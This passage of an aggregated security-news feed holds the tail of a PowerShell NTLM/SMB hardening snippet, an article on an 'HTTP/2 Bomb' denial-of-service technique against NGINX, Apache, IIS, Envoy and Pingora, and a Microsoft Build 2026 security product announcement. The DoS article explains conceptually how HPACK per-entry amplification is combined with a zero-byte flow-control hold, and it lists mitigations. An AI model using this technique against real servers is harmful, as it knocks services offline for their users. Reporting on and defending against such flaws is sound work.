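#    2 = deny all. Start in audit mode and review Event ID 8001 in the
#    Microsoft-Windows-NTLM/Operational log before moving to 2.
$lsa = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0'
Set-ItemProperty -Path $lsa -Name 'RestrictSendingNTLMTraffic' -Value 1 -Type DWord

# Verify what was applied.
Get-NetFirewallRule -DisplayName "Block outbound SMB*" | Get-NetFirewallPortFilter
Get-SmbClientConfiguration | Select-Object RequireSecuritySignature
Get-SmbServerConfiguration | Select-Object RequireSecuritySignature
Get-ItemProperty -Path $lsa -Name 'RestrictSendingNTLMTraffic'
```

Hosts that legitimately reach file servers across subnets need the firewall rule scoped more narrowly (for example by explicit address ranges), and the NTLM setting should only move from audit to deny once the 8001 events show nothing you still depend on.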



from The Hacker News https://ift.tt/BtFhM4w
via IFTTT

New HTTP/2 Bomb Vulnerability Allows Remote DoS on NGINX, Apache, IIS, Envoy & Cloudflare

Cybersecurity researchers have discovered a remote denial-of-service exploit that affects major web servers, including NGINX, Apache HTTPD, Microsoft IIS, Envoy, and Cloudflare Pingora.

The vulnerability has been codenamed HTTP/2 Bomb by Calif.

"The vulnerable behavior exists in each server's default HTTP/2 configuration," the company said, adding it was discovered by OpenAI Codex by chaining together two known techniques: a compression bomb and a Slowloris-style hold.

"The bomb targets HPACK, HTTP/2's header compression scheme: one byte on the wire becomes one full header allocation on the server, repeated thousands of times per request," Calif added. "The hold is a zero-byte flow-control window that keeps the server from ever freeing any of it."

HPACK is HTTP/2's dedicated header compression algorithm. It compresses request and response metadata using Huffman encoding, reducing header size by about 30% on average. It's also designed to be resilient to attacks like CRIME (short for "Compression Ratio Info-leak Made Easy") that can leak authentication cookies from compressed headers.

Slowloris, on the other hand, is a type of denial-of-service (DoS) attack that allows a threat actor to overwhelm a targeted server by opening and maintaining many simultaneous HTTP connections between the attacker and the target. It is an application-layer attack.

HTTP/2 Bomb is inspired by various known approaches like HPACK Bomb (aka CVE-2016-6581), which was first disclosed in 2016, as well as CVE-2025-53020, a memory exhaustion vulnerability in Apache httpd's HTTP/2 implementation, and two DoS flaws in Apache HTTP Server via crafted CONTINUATION frames (CVE-2016-8740) and worker-thread starvation (CVE-2016-1546) in an HTTP/2 connection.

"What's new here is where the amplification comes from," Calif said. "The classic bomb stuffs a large value into the table and references it repeatedly, so servers learned to cap the total decoded header size. Our variant goes the other way: the header is nearly empty, and the amplification comes from the per-entry bookkeeping the server allocates around it. The decoded-size limit never fires because there's almost nothing to decode."

In a hypothetical attack scenario, a home computer on a 100Mbps connection has the potential to render a vulnerable server inaccessible within seconds. What's more, a single client can consume and hold 32GB of server memory against Apache HTTPD and Envoy in about 20 seconds.

To counter the vulnerability, it's advised to apply the following mitigations -

  • NGINX - Upgrade to 1.29.8+, which adds the max_headers directive with a default of 1000. If upgrading is not an option, it's recommended to disable HTTP/2 with http2 off;.
  • Apache HTTPD - Fixed in mod_http2 v2.0.41. If upgrading is not an option, it's recommended to set Protocols http/1.1 to disable HTTP/2.
  • Microsoft IIS, Envoy, and Cloudflare Pingora - No patch available as of writing.

"The deeper miss is that the spec frames memory risk purely as an amplification ratio, and ratio is only half the equation," Calif said. "A 70:1 amplifier is harmless if the memory is freed when the request completes. It becomes an attack because HTTP/2 lets the client hold the connection open almost for free, pinning every allocated byte for as long as they like."



from The Hacker News https://ift.tt/3ag16Wt
via IFTTT

Tuesday, June 2, 2026

Microsoft Build 2026: Securing code, agents, and models across the development lifecycle

Today, developers and security teams are caught in growing tension. AI is accelerating development and introducing new issues around insecure code, opaque models, data exposure, and compliance. Add the challenges of shadow AI and tool sprawl and the result is a widening gap between innovation and control. As developers move faster, security teams struggle to keep up with visibility, governance, and oversight. The resulting friction across the development lifecycle is forcing a tradeoff between speed and safety that doesn’t need to exist. Security needs to move upstream to become part of how developers actually work: built into their day-to-day tools and connected to the tools security teams use.

At Microsoft Build 2026, we are announcing new security tools and capabilities to give developers clear guidance in real time, scale with the complexity of tasks, and provide security teams with a consistent view across the full lifecycle so innovation can move fast and securely without the business losing control. Learn more about our solutions to help secure your code, secure your agents, and secure your models.

Secure your code

Today’s headlines reflect the tension around the power of AI models and the potential threat they pose when used to find and exploit vulnerabilities. It is forcing a shift as security teams look for solutions to help them safely harness the power of these models. At the same time, developers want to use these same models to efficiently identify real, exploitable risk and remediate it within their flow of work. That’s why we developed the Microsoft Security multi-model agentic scanning harness (codename MDASH) and added native integration between Microsoft Defender and GitHub Code Security (part of the former GitHub Advanced Security suite) to help both security and developer teams identify and close gaps early.

Discover and validate exploitable vulnerabilities with codename MDASH

The new Microsoft Security multi-model agentic scanning harness (codename MDASH) is available in an expanded preview for eligible organizations and now includes integration with Microsoft Defender. This new agentic security system orchestrates a pipeline of more than 100 specialized AI agents using an ensemble of models to discover, validate, and prove exploitability across codebases written in popular programming languages.

This approach is unique in the industry. Our multi-model agentic scanning harness uses a configurable panel of models, ranging from state-of-the-art (SOTA) models as the heavy reasoners, to more cost-effective models for high-volume operations. This allows us to trade speed, recall, and cost, and minimize dependency on any specific model.

The combination of multiple models, hundreds of agents, and over 100 trillion signals a day helps identify real risk over theoretical noise, to help teams focus on what can be exploited. The strategic implication is clear: AI vulnerability discovery has crossed from research curiosity into production-grade defense at enterprise scale, and the durable advantage lies in the agentic system around the model rather than any single model itself. MDASH recently jumped roughly 10% in less than three weeks to a new CyberGym industry benchmark score of 96.55%.

“At Accenture, we’re always looking toward the next frontier in protecting our clients and our enterprise. What Microsoft is building with MDASH reflects a meaningful shift from reactive, rule-based scanning to agentic systems that can reason across complex codebases like a skilled security researcher,” says Kris Burkhardt, Chief Information Security Officer at Accenture. Accenture is one of a select group of Security partners and Microsoft Intelligent Security Association (MISA) members that are engaged in the preview to shape MDASH and accelerate agentic AI vulnerability discovery.

Our partner engagements reflect a shared focus on moving from reactive detection to proactive identification of exploitable risk. “We’re seeing cyber threats evolve rapidly, with AI accelerating both the scale and sophistication of attacks. Microsoft’s investment in MDASH reflects a strong commitment to helping organizations stay ahead of this curve. Based on our early discussions and exposure to the innovation, we see strong potential for MDASH to simplify and strengthen SecOps, helping organizations operate with greater resilience and confidence,” says Morgan Adamski, Principal and Deputy Platform Leader of Cyber, Data, and Tech Risk at PwC US.

Together, we are partnering across the industry to use leading models paired with our platforms and expertise to deliver protection at scale. “We’re excited to work with Microsoft on MDASH because it addresses one of the most pressing challenges our customers face: reducing the time between discovering a vulnerability and taking meaningful action. Microsoft’s role as a trusted security vendor matters here—customers need innovation, but they also need confidence, governance, and a partner they can rely on. Our early experience with MDASH has been encouraging, and we see real opportunity for it to help organizations modernize how they approach vulnerability discovery and remediation,” says Jason Rader, Insight CISO.

Reach out to your Microsoft account representative for more information on the expanded preview of codename MDASH.

Prioritize and remediate code vulnerabilities with Microsoft Defender and GitHub Code Security

While codename MDASH identifies and validates what’s truly exploitable, the integration between Microsoft Defender and GitHub Code Security (part of the former GitHub Advanced Security suite), now generally available, brings runtime context into development and security workflows so that teams can prioritize and address risks early while minimizing the demand on human resources. Vulnerabilities discovered in code are automatically enriched with real production signals, such as internet exposure and data sensitivity, to inform prioritization. Developers can then remediate issues using AI-assisted fixes that are generated, assigned, and validated through GitHub Copilot Autofix and the GitHub Copilot cloud agent.

To support responsible, coordinated disclosure of findings that represent both real and potential vulnerabilities, role-based access controls ensure that only authorized individuals can view and act on them. Together, the production signal enrichment, AI-assisted remediation, and secure handling of findings within a single workflow help security and developer teams focus on real risk and enable teams to act quickly.

Secure your agents

Agents are quickly becoming a new layer of the application stack. As developers build agents and move them into production, they need the tools to ship fast without sacrificing security, including built-in identity, governance, and safety testing. Security teams have overlapping needs: visibility into what’s running, control over what agents can access, and consistent governance across clouds and endpoints. Microsoft is delivering new solutions to help.

Build secure agents from day one

At Build 2026, Microsoft is introducing new capabilities to help developers build secure, enterprise-ready agents by default. With the general availability of the Agent 365 SDK, developers can integrate controls directly into their development workflows, bringing observability, access controls, and compliance enforcement into how agents are designed and deployed. This enables teams to build custom agents for any AI platform that are compliant and enterprise-ready and that compose well with Agent 365.

Security extends beyond development and into how agents run. On Windows, the Microsoft Execution Container (MXC) SDK provides OS-level control over agent execution, giving developers and IT teams the ability to define containment and policy, applied by the OS through isolation technologies such as process and session isolation. Windows 365 for Agents, now generally available, enables you to run any agent in a fully isolated, policy-governed Cloud PC. Native Windows integration with Agent 365 provides a common foundation for observability, security, and governance, including built-in Intune capabilities to set policies that govern agent runtime execution and control how agents operate.

These new capabilities are now in early preview.

Observe, govern, and secure agents at scale with Agent 365—now including local agents

As agents proliferate across environments, gaining visibility and control over them becomes critical. Agent 365 introduces new capabilities to manage agent sprawl and risk, including an Agent 365 Agent Registry that surfaces unmanaged local agents discovered by Microsoft Defender, Microsoft Entra, and Microsoft Intune—all working together. The registry supports more than 20 types of local agents, including coding agents, AI desktop applications, and both local and remote Model Context Protocol (MCP) servers. From there, Intune policies can be used to block common execution methods for OpenClaw agents.

Security teams also need the ability to defend against emerging threats without slowing developer productivity. Microsoft Defender, Entra, and Intune work together to provide the visibility, runtime protections, and context needed to manage agent risk. Defender enables analysts to investigate agent activity using advanced hunting and provides an exposure graph that helps teams understand how agents are connected across the network. A preview of these capabilities is coming soon.

Protecting data is foundational to securing agents at scale. Microsoft Purview adds controls to prevent data exfiltration, Data Security Posture Management risk discovery, and agentic risk detection for the coding agents Claude Code, GitHub Copilot, OpenAI Codex, and OpenClaw. This enables visibility into how local agents access sensitive data, runtime protections for risky prompts, and insights into unsafe agent behaviors. Microsoft Purview Audit also logs all agent activity for full traceability. A preview of these capabilities is coming soon.

Trust agents with your data

Developers also need direct, real-time insight into data security posture and risk signals associated with the agents they build. With Purview data risk signals embedded in the Foundry Control Plane, generally available, these signals provide guidance to developers on where to enforce protections before sensitive data is exposed. For example, Purview flags in real time when an agent surfaces sensitive financial data during testing and guides developers to mask or restrict access before deployment.

To further reduce risk, Purview introduces runtime data loss prevention (DLP) for agent prompts in Foundry, in preview with Agent 365. This capability detects, blocks, and audits sensitive data before it is processed by the agent, ensuring that sensitive information never reaches AI models.

Secure your models

Before AI reaches production, teams need to verify that the models they depend on are safe. Developers can now inspect model artifacts, whether platform-native or bring-your-own, with Defender AI model scanning, in preview. To help close gaps early, Defender AI model scanning detects and blocks potentially vulnerable or compromised models across registries, workspaces, and CI/CD pipelines, verifying model integrity before deployment.

Trust starts with security

There should never be a choice between innovation and safety.

The capabilities announced today span the full development lifecycle: discovering what’s exploitable, governing what’s running, protecting the data AI depends on, and verifying that agents behave as intended before they reach production. Microsoft security is embedded directly into the platforms and workflows developers already use, supporting innovation across Microsoft Foundry, Copilot Studio, GitHub, and open-source frameworks, and bringing discovery and governance to shadow AI.

But real progress in AI depends on more than breakthrough capabilities—it depends on whether organizations can trust the systems they are building and deploying. That is the common thread across the innovations announced at Build 2026 and the principle guiding our approach. Because the future of AI will belong not just to those who move fastest, but to those who can innovate with trust.

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us on LinkedIn (Microsoft Security) and X (@MSFTSecurity) for the latest news and updates on cybersecurity. To learn more about how security is built into the Windows platform, explore the Windows Security book and Windows Server Security book.

The post Microsoft Build 2026: Securing code, agents, and models across the development lifecycle appeared first on Microsoft Security Blog.



from Microsoft Security Blog https://ift.tt/rAQ79bk
via IFTTT